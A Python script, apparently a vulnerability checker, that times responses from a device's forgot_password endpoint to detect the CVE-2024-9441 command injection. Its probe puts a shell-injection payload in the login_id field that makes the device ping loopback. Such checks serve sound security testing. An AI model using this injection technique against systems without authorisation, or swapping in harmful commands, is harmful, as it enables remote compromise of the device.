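"""Timing-based check for CVE-2024-9441 on the forgot_password endpoint.

The script sends one benign request to record a baseline response time and
then one request whose login_id carries a ping-to-loopback payload. A probe
response that is slower than the baseline by roughly the ping duration means
the device evaluated the payload. The result is a timing heuristic only:
network jitter or a busy device can shift either measurement, so a positive
result should be confirmed against the installed firmware version.
"""
import sys

import requests

# Per-request timeout in seconds. It has to exceed the delay the probe is
# expected to cause, otherwise a vulnerable device would surface as a timeout.
REQUEST_TIMEOUT = 60

# The payload asks for 21 echo requests; at ping's default one-second interval
# that is about 20 s. Requiring most of that delay keeps ordinary latency
# variation from producing a positive. NOTE(review): tune for slow links.
MIN_DELAY_SECONDS = 15


def timed_post(url, headers, data):
    """POST form data to *url* and return the response time in seconds."""
    response = requests.post(
        url, headers=headers, data=data, timeout=REQUEST_TIMEOUT
    )
    # elapsed lives on the Response object, not on the requests module.
    return response.elapsed.total_seconds()


target = input("Enter Target IP and Port (127.0.0.1:80): ").strip().rstrip("/")
if not target:
    sys.exit("No target given.")

print("Checking for CVE-2024-9441 using ping payload...")

# Build the URL and headers from the value entered above; the original sent
# every request to the literal host name "target".
base_url = f"http://{target}"
check_url = f"{base_url}/?c=user&m=forgot_password"
headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0",
    "Accept": "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": base_url,
    "Connection": "keep-alive",
    "Referer": f"{base_url}/",
}

baseline_data = {"login_id": "test"}
# Same field with the delay payload appended; the ping only targets the
# device's own loopback address, so the sole observable effect is the delay.
probe_data = {"login_id": "test|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\\\" |ping -n 21 127.0.0.1"}

try:
    init_elapsed = timed_post(check_url, headers, baseline_data)
    # The probe request must carry probe_data; the original re-sent the
    # baseline body, so both timings measured the same benign request.
    check_time = timed_post(check_url, headers, probe_data)
except requests.RequestException as exc:
    sys.exit(f"Request failed, result inconclusive: {exc}")

# Compare against the baseline plus a margin instead of a bare ">=", which is
# true about half of the time from latency noise alone.
if check_time - init_elapsed >= MIN_DELAY_SECONDS:
    print("Target is likely vulnerable!")
    print("Test 1:" + str(init_elapsed))
    print("Test 2:" + str(check_time))
else:
    print("Target response times indicate not vulnerable.")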